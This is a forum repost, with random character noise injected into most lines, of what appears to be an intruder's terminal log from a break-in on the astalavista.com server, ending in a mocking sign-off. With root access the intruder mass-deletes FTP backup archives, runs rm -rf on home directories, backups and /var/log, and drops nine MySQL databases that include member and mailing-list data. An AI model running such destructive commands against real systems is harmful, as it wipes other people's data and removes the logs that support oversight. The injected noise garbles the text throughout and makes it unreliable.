4 n6 }0 x3 X; m V% ~9 k) mdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
$ ] P4 n3 e6 Z5 Y A! O3 f+ ^226 Transfer complete.$ ]* Z! W6 `' D' g
ftp> cd astalavista.com! G* _* z4 {) c0 h5 Z$ [
250 CWD command successful.
: ~! E# i. P# ]" \ftp> ls -la
* H5 F% M. Z4 I0 W8 v: m227 Entering Passive Mode (212,254,194,163,2,189)- S6 ~# H2 t* i
150 Opening BINARY mode data connection for ‘file list’.
& K9 t5 G0 y, g% \* A-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
. k: i7 Y8 B2 Z# s# A-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz27 o$ a9 K! N* S1 K# {/ E
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
4 R0 ^: K B; `4 o" j+ z: `7 R9 Y-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar: y W6 Q( q) F$ S2 b: @
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
8 r; U4 v% C# m, W( x7 l[snip]! I: o, t, c* P7 O
226 Transfer complete.
& z4 S, S* ^. }ftp> mdelete * N( Y; K7 f( U2 ?
ftp> ls -la
1 ~4 F$ Q N- T) v2 T" b( K227 Entering Passive Mode (212,254,194,163,2,193)
& j8 k' H$ `# n. a( j' `+ X' c150 Opening BINARY mode data connection for ‘file list’.$ [, j4 r) R% i# m) s" U/ {
226 Transfer complete.' B0 B8 d, ~. ]6 y' t
ftp>
5 ?: A6 Z% Z' C$ F1 f9 n' [0 x8 o8 B
* |( H$ _. ]( g8 Ish-3.2# cd /home9 u2 Y# H5 R1 p+ @& d# h/ Q3 d
sh-3.2# ls -la* a: ^' M8 [! j v
total 1201 m6 c3 V& Q9 x6 L7 i0 ]* P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .; x9 ~" {0 w( Y% @& d1 S
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
8 q+ Q1 c: y, jdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin/ [* ?, e8 f0 ?
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group: Y% X$ A* G, w$ g) w
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
: Z$ z& V0 y' Q7 g- T9 Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
3 W7 I/ \0 `8 s7 hdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup5 R8 s3 g8 }% H
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
, ^0 \; x6 r! d- a1 {/ L+ g+ Ddrwx–x–x 10 com com 4096 Apr 28 12:40 com- u) I6 w6 [6 d' U. ~# n& ~. r
drwxr-xr-x 2 root root 4096 May 17 2007 ftp" M( j1 I+ w, ~6 v% D
drwx—— 3 jon jon 4096 Sep 21 2007 jon1 x/ p( E7 g* Y; G2 @
drwx—— 2 root root 16384 Sep 11 2007 lost+found9 [& C2 T) C- b" h# I6 ?
drwxr-xr-x 2 root root 4096 Sep 14 2007 my: t& `* v9 C6 U9 ?: Q$ Q% E" F
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata, @0 M1 }7 I0 E9 `) ?; C7 W
drwx—— 2 jon jon 4096 Sep 15 2007 test
+ V |2 ], d; `& M2 q; c9 C3 F# @drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
/ x& S- V, G1 c0 m! k0 n! h4 [9 c& G9 f7 p2 J% C6 T5 B
sh-3.2# rm -rf backup/2 @! n' Z. X/ f4 h6 t$ U, o
sh-3.2# rm -rf backup.14161/; Y" A' l) [+ L) t
sh-3.2# rm -rf ftp/' y5 o4 n6 Y/ Y& c3 z* Q
sh-3.2# rm -rf jon/
' c/ z5 R4 m! K9 {# E2 Osh-3.2# rm -rf my/
$ x% o y& e# A# T) [sh-3.2# rm -rf mysqldata/: H% o: y3 j4 v1 p
sh-3.2# rm -rf test/! E1 F7 r; o; U! A' B# x0 b
sh-3.2# rm -rf tmp/6 E( v& T) y5 l
sh-3.2# cd ~ E4 y+ ]( J( N# t/ Z( Y- F7 a
sh-3.2# rm -rf *+ P# \: [: H8 V% ?: D
sh-3.2# rm -rf /var/log/
" X2 t) |3 ]+ [% M: \9 srm: cannot remove directory `/var/log//proftpd’: Directory not empty( @4 {3 W8 g8 ~3 Q
sh-3.2# rm -rf /home/*
/ R, B! R' R) Hsh-3.2# mysql
- F6 g% ?+ r/ V7 r H* U/ y# b" qWelcome to the MySQL monitor. Commands end with ; or \g.; I R* ^, G+ i( i F9 Q- x
Your MySQL connection id is 4071568 S- z, i9 R* M' X
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* S% d' k- z" e [" i+ T% o
4 X* v' X3 Z' p! ?5 qType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. v+ M8 ^% \5 I( U% A
8 L U4 U1 C' Fmysql> show databases;, G6 W$ m1 {6 l' }) T7 O
+———————–+
' `5 f. E$ V. {0 f0 o( D| Database |$ L9 d" F) X# q+ w7 o
+———————–+! w# o( {% |8 ~+ J$ s
| information_schema |
# S6 O- x& l( d* A| astanet_ads |9 F+ x& n$ M! @
| astanet_mailing_lists |
/ ^: Q2 H7 D5 j+ U( ]( y| astanet_mediawiki |
+ |4 n0 }( s6 F, k| astanet_membersystem |
( c- H+ O( N0 d; j( ?2 R. i| com_contrexx |
8 ~* Q, b& j$ N# u: L/ m) }| com_contrexx2 |
8 H7 I6 t7 k2 w9 N+ }" C| com_contrexx2_live |8 k7 V Z0 |. N& [9 _
| da_roundcube |
$ s3 H p/ G6 @" C| dolphin |
( V/ l# X4 I# Y! {' G| ideapool |+ d" Y$ x- _' G1 B1 |
| mysql |
& I/ \. [! X3 P9 j2 Z# b$ j| test |
# ]$ ]% g# _' e* ~| yourmaster |- @/ k4 r% Z% f# R/ w: b
+———————–+
, j9 u: Y, i" q, O5 r14 rows in set (0.03 sec)0 a2 v' I! p+ L/ r! o% E( y4 n
, |/ H( S- b) j' b! X' ^. s
mysql> drop database astanet_membersystem;
2 R8 @/ l+ d# X' [0 I( i/ `droQuery OK, 46 rows affected (0.81 sec)
5 A; ~ W c: F$ h% E% P: C
9 y8 h# o5 k. A' Z; v* vmysql> drop database com_contrexx;% p9 ^* k" v$ l5 {, O# G, H
Query OK, 211 rows affected (2.72 sec)
% T V1 s0 ]$ w/ p6 V/ h7 q/ u: Z# V6 h! E' \& c: }/ N
mysql> drop database com_contrexx2;
7 W; P. }% V+ C/ h ]Query OK, 237 rows affected (2.23 sec)
: g8 N& q% m( b) s% B, {
% D" j" m1 r6 {% u1 {mysql> drop database com_contrexx2_live;8 [$ B+ R$ F" w( L c) d" g
Query OK, 227 rows affected (7.63 sec)
- G* T, D6 Q) \1 d0 `( ]- N# k# ]% l9 S6 h) K0 ^( p2 T
mysql> drop database ideapool;
' y: _- h% O. y7 ^Query OK, 69 rows affected (0.19 sec)
* x* ]" i( j/ W$ d# g4 M4 Z) Z2 ?) }/ S5 J# V- Z; k9 F
mysql> drop database yourmaster;
" T- N! C+ m' \9 u' Q& sQuery OK, 158 rows affected (0.55 sec)
( `. L5 z! k0 f) m, n* W B3 P: H0 W) \ C# x* Y: G( k
mysql> drop database astanet_ads;. j. N) j, f/ ^
Query OK, 9 rows affected (0.11 sec)! U+ G8 P$ ^) T2 S" m
) H/ C0 B$ _. w" Mmysql> drop database astanet_mailing_lists;3 a2 S" a- S* t* _$ v! J2 Y
Query OK, 24 rows affected (1.47 sec)! [9 I: j: K4 \7 Z; U0 G! X$ n4 S
+ a/ [/ d" Y7 q- @# Qmysql> drop database astanet_mediawiki;
6 G$ i. P% z, h, O3 }Query OK, 31 rows affected (0.51 sec)4 b" s* \! @3 A+ S4 l: b
5 X1 b4 T+ j; L5 D2 B- w n7 {
mysql> show databases;
% `* C6 D2 Y0 y6 I/ d1 Z1 u8 I+——————–+3 |# h5 A' [2 C6 U) v, o+ X
| Database |
% Q+ }4 {. I( o8 S+——————–+- i$ S. {+ H, c
| information_schema |8 @# t* U; B9 G" ]: ]
| da_roundcube |4 t v$ A; U2 a M! [. c
| dolphin |
3 [+ u4 m% t& {4 v7 [| mysql |1 z3 \# M3 W5 r8 U/ Z0 D+ I2 E5 w
| test |5 A) }& d$ t8 |3 l; R" t/ j
+——————–+1 @( T- t& o8 C2 l9 q
5 rows in set (0.00 sec)
3 m- S. d3 B, ~ f& w5 Y4 _& z4 P, {2 Y+ Y
What a journey! We’re not sure exactly why the “Terminator” had any influence on8 I0 E: E+ ^3 c6 ~, X. S
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
' W. r6 V- S1 Dwrong to say this pack of morons *wont be back*.& {7 |- B# p' ?) v8 J
|
发表于 2012-11-6 21:07:34
收藏
支持
反对